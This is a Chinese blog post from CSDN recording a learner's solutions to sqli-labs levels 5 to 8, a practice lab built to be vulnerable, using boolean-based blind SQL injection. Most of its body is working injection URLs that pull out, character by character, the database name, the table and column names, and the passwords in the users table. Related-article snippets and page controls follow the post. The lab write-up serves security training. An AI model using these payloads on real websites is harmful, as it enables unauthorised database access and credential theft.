记录sqli-labs中的做题记录(布尔盲注)

已于 2024-05-19 11:17:50 修改
阅读量589 收藏 8
点赞数 27
文章标签: sql mybatis 数据库
于 2024-05-17 23:59:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_78903258/article/details/138962925
版权

目录

 

第五关

第六关

第七关

第五关

我们发现无论注入什么类型的参数都显示着下面这个东西

刚开始时我用的是报错注入,后来发现爆数据时爆不出来[无奈],看了别人的wp才知道用布尔盲注,这是因为数据 不显示只有对错页面显示我们可以选择布尔盲注。这个注入方式需要用到三个重要的函数length(),substr(),ascii(),大家需要了解他们各自的用法。不多说啦,开始注入

爆出数据库长度------这里的=可以换成>或<(我是先用>判断大概数据库长度,然后用=进行确认),看大家的喜好length(select database()) = i获取库名长度,i是长度

?id=1'and length((select database()))=8--+

判断数据库名------substr(database,i,1),将数据库进行切片,从第i个字符截取1个,对库名逐个猜解

?id=1'and ascii(substr((select database()),1,1))=115--+

判断表的数量------select count(*)

?id=1'and (select count(*) from information_schema.tables where table_schema=database())=4--+

判断所有表长度

?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=29--+

判断所有表名----这里表示第一个表的字符ascii码为101,大家需要判断剩下的,在substr函数中

?id=1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=101--+

判断所有字段长度

?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))=20--+

判断所有字段名-----这里大家也是要进行其他字段的判断,也是在substr函数中

?id=1'and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))=105--+

判断所需要的数据长度

?id=1'and length((select group_concat(password) from users))=96--+

判断数据内容

?id=1'and ascii(substr((select group_concat(password) from users),1,1))=68--+

第五关中,我们可以知道用手工进行布尔注入其实非常麻烦,需要耗费大量的时间,大家可以用python脚本自动化注入CTFHub_技能树_Web之SQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写_ctfhub布尔盲注-CSDN博客

这里我放上脚本的博客,大家可以去看看这位博客,对布尔盲注可以进行更深的了解

还有,大家如果实在不知道参数注入类型的话就去看看源代码,看不懂的就网上搜,实在不行的话再去看网上的wp

第六关

与第五关注入过程差不多,根据题目报错信息可以得知,参数类型是id=1"---双引号,只需要将第五关的'改成"

第七关

这一关与前面两关有点不同,当我们用数字型注入id=1以及后面附加条件都只显示You are in.... Use outfile......

接着我们用id=1'试试

可以发现提示语句发生明显变化

我们再用id=1"试试有什么不同

可以发现跟数字型注入是一样的,而单引号注入时提示语句发生改变,刚开始做时也是有点懵笔,但是看了一下源代码后,可以知道:当我们用【‘】注入时,改变了他原来的语句结构,才提示报错,此时我们可以用【'))】的形式注入,发现注入语句正确,没有提示报错,就可以继续用布尔盲注啦!

第八关

第八关与第五关是一样的,只是它提示的信息改了而已,大家可以去看看第五关的

注入形式为  ?id=1'--+   大家还是继续用布尔盲注语句进行

大家要勤于练习,不能只看不练,快要软考了,冲冲冲!

Paranoid144
关注
  • 27
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs 第七关 多命通关攻略
两个月亮
01-05 1564
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
SQL注入——sqli-labs-Less-9时间盲注
m0_63563528的博客
04-06 549
时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同
sqli-labs 第五关
m0_63711447的博客
04-01 4462
第五关可以用很多种方法来做,报错型注入,二次查询注入等,这里用布尔盲注手工注入的方法来做 Less -5 1、输入?id=1,显示you are in 将1改为3,5等数字,仍然得相同结果,改为100,发现没有回显,由此可知正确的情况下会返回you are in,错误的情况下没有返回, 输入?id=1',出现报错信息,由此判断存在注入漏洞 2、使用order by 语句进行查列,order by 3的时候正常回显,order by 4无回显,说明有三列 3、对于这题不能使用联合查询,无.
sqli-labs Less-9 时间盲注
m0_63711447的博客
04-12 993
使用的函数补充: if(condition,A,B)如果条件condition为true,则执行语句A,否则执行语句B eg.select if(1>2,3,4); 返回的结果为4(若是在MySQL命令行使用,应先use xxx数据库) 可组合使用,当前数据库为security ...
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 2635
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1053
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs(php7.3以上可运行)
01-29
学习sql注入的开源平台
SQL Developer 导入CSV数据
In-Memory Computing Technology
06-03 405
总览,表名那有个显示上的bug,Table.HR.null应该为Table.HR.CSV_DATA。,确实是标准的CSV(comma separated values)。本文是类似的,只不过使用的是官方提供的。
PostgreSQL的锁介绍
lee_vincent1的博客
06-02 723
PostgreSQL 的锁机制是一种用于控制数据并发访问的手段,确保数据库的完整性和一致性。在实际应用,合理使用锁可以避免数据不一致和减少死锁的发生。
postgressql——ReadBuffer_common函数(7)
Re_view的博客
05-31 464
postgressql——ReadBuffer_common函数(7)
msyql 新增排序字段sort_value并设置序列号
qq_43192617的博客
06-03 227
请确保在执行此操作之前备份您的数据,以防万一出现任何问题。此外,如果您的id字段不是连续递增的,或者您想要根据其他字段来排序,您只需要更改ORDER BY子句即可。从0开始递增到99(假设id字段是递增的),您可以使用变量来达成这个目的。表的前100条数据设置sort_value字段,并且希望。在外部查询,我们根据id将新的sort_value更新到。,它按照id的顺序选择了前100条记录。变量,并为每条记录计算了一个新的。如果您想要按照id字段的顺序为。最后,如果您想按照新的。我们创建了一个子查询。
Postgresql源码(135)生成执行计划——Var的调整set_plan_references
最新发布
InternalsOf
06-06 622
生成执行计划对var引用的调整set_plan_references
SQL—DQL之执行顺序(基础)
m0_74363339的博客
05-31 415
这篇博客是SQL分类DQL(数据查询语言)的基础语法块的最后的内容,主要讲到了DQL语句在执行的时候的编写顺序和执行顺序......
Mysql学习
2301_79390585的博客
05-30 1104
单个字段:select 字段名 from 表名;多个字段:select 字段名,字段名 from 表名;搜索多个字段时,字段名之间使用逗号隔开所有字段:select * from 表名;搜索所有字段时使用 '*' 替代字段名搜索不同的行:select distinct 字段名 from 表名;distinct关键字必须放在所有的字段名之前,不能放在部分的字段名之前;限定返回结果的行数:select 字段名 from 表名 limit 行数;
sqli-labs第一题
09-03
sqli-labs的第一题是一个简单的SQL注入挑战,旨在让你熟悉基本的SQL注入技术。该题目要求你通过输入特定的注入语句来绕过应用程序的身份验证系统,以获得管理员权限。 具体步骤如下: 1. 打开sqli-labs网站并导航...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值